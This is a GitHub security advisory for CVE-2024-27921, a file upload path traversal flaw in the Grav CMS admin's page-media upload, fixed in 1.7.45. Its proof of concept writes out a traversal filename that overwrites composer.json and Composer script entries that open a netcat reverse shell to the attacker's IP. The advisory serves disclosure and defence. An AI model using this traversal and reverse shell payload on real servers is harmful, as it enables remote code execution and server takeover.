Skip to content

File Upload Path Traversal

High
rhukster published GHSA-m7hx-hw6h-mqmc Mar 21, 2024

Package

composer getgrav/grav (Composer)

Affected versions

<= 1.7.44

Patched versions

1.7.45

Description

Summary

Grav is vulnerable to a file upload path traversal vulnerability, that can allow an adversary to replace or create files with extensions such as .json, .zip, .css, .gif, etc. This vulnerabiltiy can allow attackers to inject arbitrary code on the server, undermine integrity of backup files by overwriting existing backups or creating new ones, and exfiltrating sensitive data using CSS Injection exfiltration techniques.

Installation Configuration

  • Grav CMS 1.10.44
  • Apache web server
  • php-8.2

Details

Vulnerable code location: grav/system/src/Grav/Common/Media/Traits/MediaUploadTrait.php/checkFileMetadata() method_

public function checkFileMetadata(array $metadata, string $filename = null, array $settings = null): string
{
    // Add the defaults to the settings.
    $settings = $this->getUploadSettings($settings);

    // Destination is always needed (but it can be set in defaults).
    $self = $settings['self'] ?? false;
    if (!isset($settings['destination']) && $self === false) {
        throw new RuntimeException($this->translate('PLUGIN_ADMIN.DESTINATION_NOT_SPECIFIED'), 400);
    }

    if (null === $filename) {
        // If no filename is given, use the filename from the uploaded file (path is not allowed). 
        $folder = '';
        $filename = $metadata['filename'] ?? '';
    } else {
        // If caller sets the filename, we will accept any custom path.
        $folder = dirname($filename); `-> Vulnerable Code`
        if ($folder === '.') {
            $folder = '';
        }
        $filename = Utils::basename($filename);

PoC

  1. Log in to the Grav CMS using a super administrator account.
  2. Add a user in the "Accounts" section with the following permissions:
  • Login to Admin
  • Page Update
  1. Log out of the super administrator account and log in with the previously created user account.
  2. Navigate to the https://admin/pages/home.
  3. Use the following command in Kali Linux to open a netcat listener:
nc -lvnp 8081

image
Note: "nc" or netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. We are using this tool to get a reverse shell from the server hosting Grav CMS.
7. Using a web interception proxy, click on the "Page Media" section and upload a json file with the following added to the "scripts" section (https://getcomposer.org/doc/articles/scripts.md):

"post-install-cmd": "nc <IP-address> 8081 -e /bin/bash",
"post-update-cmd": "nc <IP-address> 8081 -e /bin/bash"

Note: The post installation and update script used in this PoC is only for demonstration purposes. There are various other scripts that may be injected such as command that executes the corresponding script before any Composer Command is executed on the CLI.
image
Note: . Please replace with the IP address of the Kali Linux netcat listener.
8. Modify the "name" parameter to "../../../c/omposer.json" and forward the request.
9. Observe the successful upload message from the server response:
image
10. In the Grav web root, observe that the "composer.json" file was successfully replaced by the malicious "composer.json" file containing a reverse shell script.
11. Run any variations of the following commands in the Grav web server and observe the successful reverse shell:

  • bin/grav composer
  • composer update
  • composer install
    image

Impact

  1. Arbitrary Code Injection: Attackers can replace the composer.json file with a malicious one containing arbitratry composer scripts. This can result in code execution when the composer command is used for any purpose in the server. that can allow attackers to get a reverse shell on the server.

  2. Backup Compromise: .zip backup files can be replaced, undermining data integrity and recovery mechanisms:
    image
    image

  3. Sensitive Information Exposure: Modification of .css files provides an avenue for attackers to exfiltrate sensitive information, such as usernames and passwords, compromising confidentiality.
    image

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
None
Integrity
High
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:L

CVE ID

CVE-2024-27921

Weaknesses

No CWEs

Credits